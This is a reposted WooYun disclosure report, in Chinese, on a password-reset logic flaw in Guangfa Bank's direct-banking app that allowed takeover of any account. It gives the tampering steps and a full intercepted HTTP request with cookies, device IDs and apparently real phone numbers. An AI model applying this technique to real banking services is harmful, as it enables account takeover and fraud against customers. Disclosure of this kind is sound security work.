P2P金融安全之广发银行直销银行任意账户登录

admin
admin
admin
141465
文章
117
评论
2017年3月25日18:14:46评论240 views字数 210阅读0分42秒阅读模式
摘要

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-22: 厂商已经确认,细节仅向厂商公开
2016-04-01: 细节向核心白帽子及相关领域专家公开
2016-04-11: 细节向普通白帽子公开
2016-04-21: 细节向实习白帽子公开
2016-05-06: 细节向公众公开

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2016-187344

漏洞标题: P2P金融安全之广发银行直销银行任意账户登录

相关厂商: 广发银行

漏洞作者: 咚咚呛

提交时间: 2016-03-21 16:42

公开时间: 2016-05-06 09:26

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 金融小能手

1人收藏

漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-22: 厂商已经确认,细节仅向厂商公开
2016-04-01: 细节向核心白帽子及相关领域专家公开
2016-04-11: 细节向普通白帽子公开
2016-04-21: 细节向实习白帽子公开
2016-05-06: 细节向公众公开

简要描述:

我一直是广发银行直销银行的客户,也是广发直销银行的使用者,已经赚了不少钱了,此次风险影响广发直销银行的所有账户,此风险实属不该。
首先让我吐槽一句,真心的,只有使用过才知道影响有多大,当涉及到自身利益的时候,才感觉到“卧槽,这玩意怎么这样啊”

详细说明:

此风险漏洞在密码找回功能中,可篡改任意手机号的用户。

首先说下,测试发现,广发银行直销银行用户我简单分为两种,一种绑定银行卡实名制,一种注册完用户后不实名。当然找回密码也分为两种,实名制后找回密码如下,需要填写如下信息,

P2P金融安全之广发银行直销银行任意账户登录

需要输入卡号,身份证等,杜绝了多数风险(嘿嘿~~还有个等你修复了这个我再验证下)。但是未实名的话需要输入如下即可:

P2P金融安全之广发银行直销银行任意账户登录

本次风险就出在未实名的找回密码上,且可致使篡改实名用户的密码。

漏洞利用步骤如下:

1、首先正常操作密码找回功能,可知其流程如下,先填写自己的为未实名手机号如图:

P2P金融安全之广发银行直销银行任意账户登录

2、跳到第二部,获取并填入短信验证,并填入篡改密码123456abc等,如下:

P2P金融安全之广发银行直销银行任意账户登录

确认后拦截数据包,如下,暂不放行,

code 区域 
POST /zjr/apps/services/api/FinanceBank/iphone/query HTTP/1.1
 Host: 8.95508.com:443
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11B554a/Worklight/6.3.0.0 (5583902464)
 WL-Instance-Id: j5gsreanns2055aens0c39kvpd
 Cookie: WL_PERSISTENT_COOKIE=a664f3c6-4d62-4a99-a371-e8c51c9d9729; BIGipServerpool-wllc-web-3093=1510058176.5388.0000; BIGipServerpool_wlrz_ibank_3081=1543612608.2316.0000; JSESSIONID=0000fVuqDF7GEVScDv3p9s_z6uR:19dcfhbd9
 x-wl-clientlog-osversion: 7.0.4
 x-wl-clientlog-env: iphone
 x-wl-app-details: {"applicationDetails":{"platformVersion":"6.3.0.0","nativeVersion":"2572543141","skinName":"default","skinChecksum":3574296930,"skinLoaderChecksum":"(null)"}}
 x-wl-clientlog-model: iPhone6,2
 x-wl-analytics-tracking-id: B86A113B-7521-48ED-9E2F-83D8935C102B
 x-wl-clientlog-deviceId: 6D497C9F-7AF2-4786-B29E-17D42E433198
 Content-Length: 1617
 x-wl-device-id: 95EB1CD1-D325-4D90-96AA-686A7B9F5A04
 Connection: keep-alive
 x-wl-clientlog-appname: FinanceBank
 Accept-Language: zh-Hans
 x-wl-clientlog-appversion: 1.0.12
 Accept: text/javascript, text/html, application/xml, text/xml, */*
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Accept-Encoding: gzip, deflate
 x-wl-app-version: 1.0.12
 
 adapter=FinanceBank_LCAdapter&procedure=LC0014&compressResponse=true&parameters=%5B%7B%22channel%22%3A%22app%22%2C%22flowId%22%3A%221022014010201458548340302%22%2C%22frontDate%22%3A%2220160321%22%2C%22frontTime%22%3A%22161900%22%2C%22tranCode%22%3A%22LC0014%22%2C%22appCode%22%3A%22app3%22%2C%22custName%22%3A%2215910676783%22%2C%22flag%22%3A%220%22%2C%22newPwd%22%3A%223952084F622F27A7C9B7A60BA25157D2A98D54B662F82E8D526E77E7D947D6CC522CB53F7C56E874692D62A4A49EA8023E1AED41516371D2AB36C7E90ABD938529273334DCE7397BBE67F8BECF328F5E09FCAA491C3534EB1D10F4D59243E7143AC8C7B09802289D4F73B5B1E0FBF15F46CAB959F56C255D62E85830D2F22535BF9858223C7597ACE8AA1EC6E11348E3880C33ABF6D9F72548A5FB8F41C5B343C794286F11467A25C5CB0EE19D9FD7786E8ECFE8E7677830A84B6D4F74FFDAA2B8E5D16BBA1C73655EFCA276FEA60F505763C99D451EA7BF1AE846A4A60FFB601E3A20837264682961822BF0ED6DD932613B4009AE862940D508CDA02F10496D0E09%22%2C%22confirmPwd%22%3A%223952084F622F27A7C9B7A60BA25157D2A98D54B662F82E8D526E77E7D947D6CC522CB53F7C56E874692D62A4A49EA8023E1AED41516371D2AB36C7E90ABD938529273334DCE7397BBE67F8BECF328F5E09FCAA491C3534EB1D10F4D59243E7143AC8C7B09802289D4F73B5B1E0FBF15F46CAB959F56C255D62E85830D2F22535BF9858223C7597ACE8AA1EC6E11348E3880C33ABF6D9F72548A5FB8F41C5B343C794286F11467A25C5CB0EE19D9FD7786E8ECFE8E7677830A84B6D4F74FFDAA2B8E5D16BBA1C73655EFCA276FEA60F505763C99D451EA7BF1AE846A4A60FFB601E3A20837264682961822BF0ED6DD932613B4009AE862940D508CDA02F10496D0E09%22%2C%22mobileNo%22%3A%2215910676783%22%2C%22codeId%22%3A%221001594011%22%2C%22messageCode%22%3A%22675443%22%7D%5D&__wl_deviceCtx=AcDdwu07njsuqBAA&isAjaxRequest=true&x=0.0963608983438462

P2P金融安全之广发银行直销银行任意账户登录

在数据包参数parameters中包含两个手机号,第一个为custName第二个为mobileNo,两个功能分别为目标用户名和本次短信验证手机号,篡改第一个custName为被攻击手机号如已实名制的手机号15910773439,如图:

P2P金融安全之广发银行直销银行任意账户登录

数据包方行,即可完成有效攻击,

P2P金融安全之广发银行直销银行任意账户登录

攻击后登录被攻击者账户如下:

P2P金融安全之广发银行直销银行任意账户登录

漏洞证明:

P2P金融安全之广发银行直销银行任意账户登录

P2P金融安全之广发银行直销银行任意账户登录

P2P金融安全之广发银行直销银行任意账户登录

P2P金融安全之广发银行直销银行任意账户登录

P2P金融安全之广发银行直销银行任意账户登录

P2P金融安全之广发银行直销银行任意账户登录

修复方案:

建议客户Nu和手机号统一为一个参数即可。

版权声明:转载请注明来源 咚咚呛@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-03-22 09:26

厂商回复:

感谢对我行业务的关注,我们已及时处理。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-21 17:19 | 土夫子 ( 普通白帽子 | Rank:527 漏洞数:88 | 看似山穷水尽,终将柳暗花明)

    1

    当涉及到自身利益的时候,才感觉到“卧槽,这玩意怎么这样啊”

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin